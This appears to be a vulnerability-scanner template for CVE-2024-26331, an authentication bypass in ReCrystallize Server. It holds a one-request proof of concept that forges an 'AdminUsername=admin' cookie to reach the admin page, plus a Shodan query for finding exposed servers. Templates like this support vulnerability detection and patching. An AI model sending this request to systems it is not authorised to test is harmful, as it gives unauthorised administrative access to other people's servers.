This vulnerability allows an attacker to bypass authentication in the ReCrystallize Server application by manipulating the 'AdminUsername' cookie. This gives the attacker administrative access to the application's functionality, even when the default password has been changed.
PoC代码[已公开]
id: CVE-2024-26331
info:
name: ReCrystallize Server - Authentication Bypass
author: Carson Chan
severity: high
description: |
This vulnerability allows an attacker to bypass authentication in the ReCrystallize Server application by manipulating the 'AdminUsername' cookie. This gives the attacker administrative access to the application's functionality, even when the default password has been changed.
reference:
- https://preview.sensepost.com/blog/2024/from-discovery-to-disclosure-recrystallize-server-vulnerabilities/
- https://sensepost.com/blog/2024/from-discovery-to-disclosure-recrystallize-server-vulnerabilities/
- https://www.recrystallize.com/merchant/ReCrystallize-Server-for-Crystal-Reports.htm
- https://github.com/Ostorlab/KEV
classification:
epss-score: 0.63998
epss-percentile: 0.98377
metadata:
verified: true
max-request: 1
shodan-query: title:"ReCrystallize"
tags: cve,recrystallize,auth-bypass,cve2024
http:
- method: GET
path:
- "{{BaseURL}}/Admin/Admin.aspx"
headers:
Cookie: "AdminUsername=admin"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "ReCrystallize Server Administration"
- "License Status:"
- "System Info</a>"
condition: and
- type: status
status:
- 200
# digest: 490a0046304402207f520524d8106f3fc2bdfccd44f75e7e4b5578018e0c340267fa8d74d6e8f89e02203791654130f8f626812eebfa73462489a684328cd96365cf3d7aff8015addc1d:922c64590222798bb761d5b6d8e72950